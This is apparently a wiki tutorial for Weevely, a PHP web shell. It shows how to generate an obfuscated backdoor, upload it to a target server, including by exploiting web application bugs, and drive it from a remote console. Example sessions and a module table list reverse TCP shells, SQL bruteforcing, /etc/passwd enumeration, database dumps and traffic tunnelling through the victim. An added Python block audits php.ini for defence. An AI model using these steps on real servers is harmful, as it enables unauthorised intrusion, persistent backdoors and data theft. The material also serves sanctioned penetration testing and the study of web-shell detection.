
public epinna / Weevely



Tutorial
Weevely is a PHP web shell that provides a telnet-like console to execute system commands and automate administration and post-exploitation tasks. Generate the PHP code, upload it to the target web server, and run the Weevely client locally to transmit shell commands.

Prerequisites
Linux
A basic Python installation is enough to support Weevely on Linux. Some optional modules require third-party software:

To use module :file.mount, install httpfs.

To use module :audit.mapwebfiles, install beautifulsoup (you can fetch it from APT with sudo apt-get install python-beautifulsoup in a Debian-like environment).

Windows/MacOS
pyreadline is required in a Windows environment. First download and install the setuptools Python package manager utility from the official site, then run %PYTHONPATH%/Scripts/easy_install.exe beautifulsoup4 pyreadline (this also installs the optional beautifulsoup package). The same goes for a MacOS environment.

Server-side installation
Weevely needs a small PHP backdoor installed on the target web server. First, generate the PHP code with:

    # Usage: ./weevely generate <password> [output path]
    $ ./weevely.py generate p4ssw0rd [generate.php]
    Backdoor file 'weevely.php' created with password 'p4ssw0rd'.

Then upload weevely.php to the target web server, either by using legitimate user access or by exploiting web application bugs during a successful penetration test. A number of different generators are available; see the Generators list for more information.

Send commands
At startup, Weevely automatically detects the best method to execute system commands on the remote host. Here's a sample session:

    # Usage: ./weevely <url> <password>
    $ ./weevely.py http://target.org/weevely.php p4ssw0rd
          ________                      __
         |  |  |  |-----.----.-.--.----'  |--.--.
         |  |  |  |  -__| -__| |  | -__|  |  |  |
         |________|_____|____|___/|____|__|___  | v1.0
                                          |_____|
                  Stealth tiny web shell

    [+] Welcome to Weevely. Browse filesystem and execute system commands.
    [+] Hint: Use ':help' to list available modules.

    www-data@target.com:/var/www/$ uname
    Linux
    www-data@target.com:/var/www/$ ls /
    bin   cdrom  etc   initrd.img  lib64  mnt  proc  run   selinux  sys  usr
    boot  dev    home  lib         media  opt  root  sbin  srv      tmp  var
    www-data@target.com:/var/www/$

When an overly restrictive PHP configuration prevents system command execution, Weevely falls back to a pure PHP shell (the prompt becomes (PHP)>) that provides built-in versions of the ls and cd commands and still supports module execution.
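A defender-side check related to the fallback described above, as an added example that is not part of the Weevely project: it parses php.ini text and reports which command-execution functions the disable_functions directive leaves enabled. The function list and the sample configurations are assumptions constructed for this example; the page does not say which functions Weevely probes.

```python
# Added example, not Weevely code: check whether a php.ini still lets PHP
# start OS processes (the condition behind the system-shell vs PHP-only modes).

# Assumption: PHP functions treated here as command-execution primitives.
EXEC_FUNCTIONS = ("system", "exec", "passthru", "shell_exec",
                  "popen", "proc_open", "pcntl_exec")


def read_directive(ini_text, name):
    """Return the last value assigned to `name` in php.ini text ('' if unset)."""
    value = ""
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()      # ';' starts a comment
        key, sep, val = line.partition("=")
        if sep and key.strip().lower() == name:
            value = val.strip().strip("\"'")     # a later assignment overrides
    return value


def audit_php_ini(ini_text):
    """Classify a php.ini by the command-execution functions it leaves enabled."""
    disabled = {f.strip().lower()
                for f in read_directive(ini_text, "disable_functions").split(",")
                if f.strip()}
    enabled = [f for f in EXEC_FUNCTIONS if f not in disabled]
    return {
        "exec_enabled": enabled,
        # With none left, only PHP-level access remains, which the page's
        # fallback shell still uses: this setting limits impact, it does not
        # remove an uploaded script.
        "mode": "system commands possible" if enabled else "PHP code only",
    }


# Constructed sample configurations (not taken from any real host).
SAMPLE_DEFAULT = "[PHP]\nengine = On\ndisable_functions =\n"
SAMPLE_PARTIAL = ("disable_functions = system, exec, passthru, shell_exec\n"
                  "; popen and proc_open were forgotten\n")
SAMPLE_HARDENED = ("disable_functions = system\n"   # overridden below
                   'disable_functions = "system,exec,passthru,shell_exec,'
                   'popen,proc_open,pcntl_exec"\n')

if __name__ == "__main__":
    for label, ini in (("default", SAMPLE_DEFAULT), ("partial", SAMPLE_PARTIAL),
                       ("hardened", SAMPLE_HARDENED)):
        print(label, audit_php_ini(ini))
```

A "PHP code only" result still leaves file and database access available to any PHP script on the host, so pair this check with monitoring of the web root for unexpected PHP files.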

Single commands can also be executed directly from the command line:
    # Usage: ./weevely <url> <password> "<command>"
    $ ./weevely.py http://target.org/w.php p4ssw0rd "uname"
    Linux

Modules
Weevely's modular structure aims to simplify administration and post-exploitation tasks. A full description of each module is available on the Modules list page.

Show modules help


Run :help to print the module list:
    www-data@target.com:/var/www/$ :help
    +--------------------+------------------------------------------------------+
    | generator          | description                                          |
    +--------------------+------------------------------------------------------+
    | :generate.htaccess | Generate backdoored .htaccess                        |
    | :generate.php      | Generate obfuscated PHP backdoor                     |
    | :generate.img      | Backdoor existing image and create related .htaccess |
    +--------------------+------------------------------------------------------+
    +----------------------+-----------------------------------------------------------------------+
    | module               | description                                                           |
    +----------------------+-----------------------------------------------------------------------+
    | :audit.systemfiles   | Find wrong system files permissions                                   |
    | :audit.userfiles     | Find wrong file permissions in users home folders                     |
    | :audit.etcpasswd     | Enumerate users and /etc/passwd content                               |
    | :audit.mapwebfiles   | Crawl and enumerate web folders files permissions                     |
    | :audit.phpconf       | Check php security configurations                                     |
    | :shell.sh            | Execute system shell command                                          |
    | :shell.php           | Execute PHP statement                                                 |
    | :system.info         | Collect system informations                                           |
    | :find.name           | Find files with matching name                                         |
    | :find.perms          | Find files with write, read, execute permissions                      |
    | :find.suidsgid       | Find files with superuser flags                                       |
    | :backdoor.reversetcp | Send reverse TCP shell                                                |
    | :backdoor.tcp        | Open a shell on TCP port                                              |
    | :bruteforce.sqlusers | Bruteforce all SQL users                                              |
    | :bruteforce.sql      | Bruteforce SQL username                                               |
    | :file.edit           | Edit remote file                                                      |
    | :file.read           | Read remote file                                                      |
    | :file.webdownload    | Download binary/ascii files from target filesystem                    |
    | :file.enum           | Enumerate remote paths                                                |
    | :file.upload2web     | Upload binary/ascii file into web folders and guess corresponding url |
    | :file.upload         | Upload binary/ascii file into target filesystem                       |
    | :file.rm             | Remove remote files and folders                                       |
    | :file.check          | Check remote files type, md5 and permission                           |
    | :file.mount          | Mount remote filesystem using HTTPfs                                  |
    | :file.download       | Download binary/ascii files from target filesystem                    |
    | :sql.console         | Run SQL console and single queries                                    |
    | :sql.dump            | Get SQL database dump                                                 |
    | :net.proxy           | Install and run Proxy to tunnel traffic through target                |
    | :net.scan            | Print interface addresses                                             |
    | :net.phpproxy        | Install remote PHP proxy                                              |
    | :net.ifaces          | Print interfaces addresses                                            |
    +----------------------+-----------------------------------------------------------------------+

    Hint: Run ':help <module>' to print detailed usage informations.

To get detailed information about a module, run :help <module name>.


    www-data@target.com:/var/www/$ :help file.upload
    usage: :file.upload [-chunksize CHUNKSIZE] [-vector {file_put_contents,fwrite}] [-force] lpath rpath

    Upload binary/ascii file into target filesystem

    positional arguments:
      lpath
      rpath

    optional arguments:
      -chunksize CHUNKSIZE
      -vector {file_put_contents,fwrite}
      -force

    www-data@target.com:/var/www/$

Module name completion is available by pressing the <tab> key.

Run module
Execute a module with :<module> [options] as described in the help, for example:
    www-data@target.com:/var/www/$ :file.upload /local/home/foo.sh /tmp/bar.sh
    True
    www-data@target.com:/var/www/$ ls -al /tmp/bar.sh
    -rw-r--r-- 1 www-data www-data 1812 Jan 9 19:31 /tmp/bar.sh

Module options can be set for the entire session with :set <module> <option>..., where every <option> is an argument=value string. Subsequent executions of the module will use the specified options.

Script loading
A script is a text file containing one Weevely command per line. To execute a script at runtime, use :load <script path>. Weevely reads a default rc file (~/.weevely/weevely.rc) at startup; this file is used to initialize some parameters before loading modules.

Proxy setting
To run Weevely through an HTTP proxy, set the shell.php proxy parameter in the default rc file:

    $ cat ~/.weevely/weevely.rc
    :set shell.php proxy=http://myproxy.com:8123
    $ ./weevely.py http://target.org/w.php p4ssw0rd ":system.info client_ip"
    myproxy.com
    www-data@target.com:/var/www/$

SOCKS4 and SOCKS5 proxies will also work (set socks4://host:port or socks5://host:port respectively).

Last edited by epinna